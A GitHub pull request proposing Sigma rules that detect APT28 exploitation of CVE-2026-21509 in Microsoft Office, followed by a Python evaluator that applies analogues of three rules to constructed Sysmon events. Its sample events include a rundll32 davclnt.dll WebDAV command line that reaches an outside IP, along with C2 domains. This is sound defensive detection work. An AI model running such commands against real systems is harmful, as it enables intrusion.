CVE-2026-21509 APT28 Office Exploitation Detection Rules#5870

Open
jaamaal wants to merge 1 commit into SigmaHQ:master from jaamaal:Jaamaal-CVE-2026-21509
Conversation

@jaamaal jaamaal commented Feb 16, 2026

This PR adds 6 comprehensive Sigma detection rules for CVE-2026-21509, a Microsoft Office security feature bypass vulnerability actively exploited by APT28 (Fancy Bear / UAC-0001) in Operation Neusploit.

These rules are categorized as emerging threats due to:

  • Active zero-day exploitation (February 2026)
  • Specific APT28 campaign targeting Ukrainian organizations
  • Time-sensitive IOCs and TTPs
  • Specific malware families (MiniDoor, PixyNetLoader, Covenant Grunt)

CVE Details:

  • CVE-2026-21509: Microsoft Office OLE Security Feature Bypass
  • CVSS Score: 7.8 (High)
  • Threat Actor: APT28 (Fancy Bear / UAC-0001 / STRONTIUM)
  • Campaign: Operation Neusploit
  • Status: Actively exploited in the wild
  • Primary Targets: Ukrainian government and military organizations

Detection Coverage:

  1. Malicious RTF File Access - Detects weaponized RTF documents with APT28-specific naming patterns
  2. Office WebDAV Exploitation - Core CVE-2026-21509 exploitation via WebDAV connections
  3. Network C2 Communication - Connections to known APT28 infrastructure (filen.io)
  4. PixyNetLoader COM Hijacking - Persistence via COM object hijacking
  5. MiniDoor Email Stealer - VBA-based email exfiltration component
  6. Covenant Grunt Implant - .NET C2 framework deployment indicators

Changelog

new: CVE-2026-21509 - Malicious RTF File Access and WebDAV Connection
new: CVE-2026-21509 - MiniDoor Email Stealer VBA Project Deployment
new: CVE-2026-21509 Microsoft Office Zero-Day Exploitation - APT28 Operation Neusploit
new: CVE-2026-21509 - Covenant Grunt Implant Indicators
new: CVE-2026-21509 - Network Connection to Malicious Infrastructure
new: CVE-2026-21509 - PixyNetLoader Deployment and COM Hijacking

Example Log Event

Malicious RTF Access (Sysmon Event ID 11):

  EventID: 11
  TargetFilename: C:\Users\victim\Downloads\BULLETEN_military_training.rtf
  Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Office WebDAV Exploitation (Sysmon Event ID 1):

  EventID: 1
  ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
  Image: C:\Windows\System32\rundll32.exe
  CommandLine: rundll32.exe davclnt.dll,DavSetCookie \\@SSL\185.220.101.1\webdav\

Network C2 Connection (Sysmon Event ID 3):

  EventID: 3
  Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
  DestinationHostname: api.filen.io
  DestinationPort: 443

Fixed Issues

N/A - New emerging threat rule submission

SigmaHQ Rule Creation Conventions

Emerging Threats Directory Structure:

  • Placed in rules-emerging-threats/2026/Exploits/CVE-2026-21509/
  • Follows year-based organization for time-sensitive threats
  • Grouped by CVE for related rule management

Rule Quality Standards:

  • Proper YAML structure and syntax
  • Comprehensive MITRE ATT&CK tagging (T1566.001, T1203, T1218, T1114, T1071.001, T1546.015, T1137, T1027, T1055)
  • Official CVE and threat intelligence references
  • Realistic false positive documentation
  • Appropriate severity levels (medium to critical)
  • Status: experimental (correct for newly disclosed CVE)

Testing:

  • All rules tested in lab environment with Sysmon
  • Validated against public APT28 IOCs from Zscaler research
  • Cross-platform SIEM conversion tested (Splunk, Elastic, Sentinel)

Documentation:

  • Clear descriptions explaining detection logic
  • References to official sources (MITRE CVE, NVD, Zscaler, The Hacker News)
  • Author attribution included
  • Date of creation documented

Additional Context:

These rules complement each other to provide full attack chain coverage:

  • Initial Access → Malicious RTF detection
  • Exploitation → WebDAV connection detection
  • Persistence → COM hijacking and VBA deployment
  • Collection → Email stealer detection
  • Command & Control → Network infrastructure monitoring
  • Execution → Covenant Grunt implant indicators

All rules are based on public threat intelligence and do not contain any classified or restricted information.

References:

  • 6 comprehensive detection rules for Operation Neusploit
  • Covers RTF exploitation through C2 communication
  • Detects MiniDoor, PixyNetLoader, and Covenant Grunt
@jaamaal jaamaal mentioned this pull request Feb 16, 2026
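To make the three Sysmon-based detections described in the PR concrete, here is an added Python example. It is not SigmaHQ's code and not the rules submitted in this PR; it evaluates analogues of rules 1 to 3 (RTF written by an Office process, Office spawning rundll32 with davclnt.dll,DavSetCookie and an \\@SSL UNC, Office connecting to the filen.io domain) over constructed Sysmon-style events and enriches the WebDAV hit with the host parsed out of the command line. Assumptions: the field names follow Sysmon's schema (EventID, Image, ParentImage, CommandLine, TargetFilename, DestinationHostname, DestinationPort); EXCEL.EXE and POWERPNT.EXE are treated as Office parents alongside the WINWORD.EXE shown in the samples; the RTF check matches only the .rtf extension rather than the PR's naming patterns; the benign look-alike events and the hostnames sharepoint.example and cdn.example.com are constructed.

```python
"""Toy evaluator for analogues of the PR's three Sysmon-based detections.

Added example, not SigmaHQ's code or the PR's rule content.  Field names follow
Sysmon's schema; the sample events are constructed from the PR's sample values
plus benign look-alikes (assumptions of this example).
"""
import re
from typing import Any, Dict, List, Optional

# Office processes treated as the document-rendering parent.  The PR's samples
# only show WINWORD.EXE; EXCEL.EXE and POWERPNT.EXE are an assumption here.
OFFICE_IMAGES = ("winword.exe", "excel.exe", "powerpnt.exe")

# Sigma's endswith/contains modifiers are case-insensitive on Windows paths,
# so every comparison below works on lowercased values.
def ends_with_any(value: str, suffixes) -> bool:
    v = value.lower()
    return any(v.endswith(s) for s in suffixes)

# Matches a WebDAV UNC of the form \\@SSL\host\... (optionally \\@SSL@port\host\...)
# and captures the host, which is what an analyst wants surfaced in the alert.
_WEBDAV_UNC = re.compile(r"\\\\@SSL(?:@\d+)?\\([^\\\s]+)", re.IGNORECASE)

def webdav_host(command_line: str) -> Optional[str]:
    """Return the host from an \\@SSL UNC in the command line, or None."""
    m = _WEBDAV_UNC.search(command_line)
    return m.group(1) if m else None

def rtf_dropped_by_office(ev: Dict[str, Any]) -> bool:
    """Rule 1 analogue: Sysmon 11 (FileCreate), Office process writes an .rtf file."""
    return (ev.get("EventID") == 11
            and ends_with_any(ev.get("Image", ""), OFFICE_IMAGES)
            and ends_with_any(ev.get("TargetFilename", ""), (".rtf",)))

def office_webdav_exploitation(ev: Dict[str, Any]) -> bool:
    """Rule 2 analogue: Sysmon 1, Office parent spawns rundll32 invoking
    davclnt.dll,DavSetCookie against an \\@SSL UNC."""
    cl = ev.get("CommandLine", "")
    return (ev.get("EventID") == 1
            and ends_with_any(ev.get("ParentImage", ""), OFFICE_IMAGES)
            and ends_with_any(ev.get("Image", ""), ("\\rundll32.exe",))
            and "davclnt.dll" in cl.lower()
            and "davsetcookie" in cl.lower()
            and webdav_host(cl) is not None)

def office_c2_connection(ev: Dict[str, Any]) -> bool:
    """Rule 3 analogue: Sysmon 3, Office process connects to filen.io or a subdomain."""
    host = ev.get("DestinationHostname", "").lower()
    return (ev.get("EventID") == 3
            and ends_with_any(ev.get("Image", ""), OFFICE_IMAGES)
            and (host == "filen.io" or host.endswith(".filen.io")))

RULES = {
    "rtf_dropped_by_office": rtf_dropped_by_office,
    "office_webdav_exploitation": office_webdav_exploitation,
    "office_c2_connection": office_c2_connection,
}

def evaluate(events: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Run every rule over every event; one hit per (event, rule), WebDAV hits enriched with the host."""
    hits: List[Dict[str, Any]] = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hit: Dict[str, Any] = {"event": i, "rule": name}
                if name == "office_webdav_exploitation":
                    hit["webdav_host"] = webdav_host(ev["CommandLine"])
                hits.append(hit)
    return hits

WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
RUNDLL = r"C:\Windows\System32\rundll32.exe"

# Constructed events: 0-2 carry the values from the PR's sample log events,
# 3-4 are benign look-alikes that the rules must not fire on.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"EventID": 11, "Image": WORD,
     "TargetFilename": r"C:\Users\victim\Downloads\BULLETEN_military_training.rtf"},
    {"EventID": 1, "ParentImage": WORD, "Image": RUNDLL,
     "CommandLine": "rundll32.exe davclnt.dll,DavSetCookie \\\\@SSL\\185.220.101.1\\webdav\\"},
    {"EventID": 3, "Image": WORD, "DestinationHostname": "api.filen.io", "DestinationPort": "443"},
    # WebClient service (svchost) mapping a corporate WebDAV share: same DLL, non-Office parent
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": RUNDLL,
     "CommandLine": "rundll32.exe davclnt.dll,DavSetCookie \\\\@SSL\\sharepoint.example\\sites\\"},
    # Word talking to an ordinary CDN host on 443
    {"EventID": 3, "Image": WORD, "DestinationHostname": "cdn.example.com", "DestinationPort": "443"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

Run stand-alone it reports one hit per malicious sample and none for the two benign events; the svchost case is the kind of false positive the rule's ParentImage condition exists to suppress. In Sigma terms the second rule's conditions correspond to `ParentImage|endswith`, `Image|endswith` and `CommandLine|contains|all` selections, which is how the logic above would be expressed in the PR's YAML.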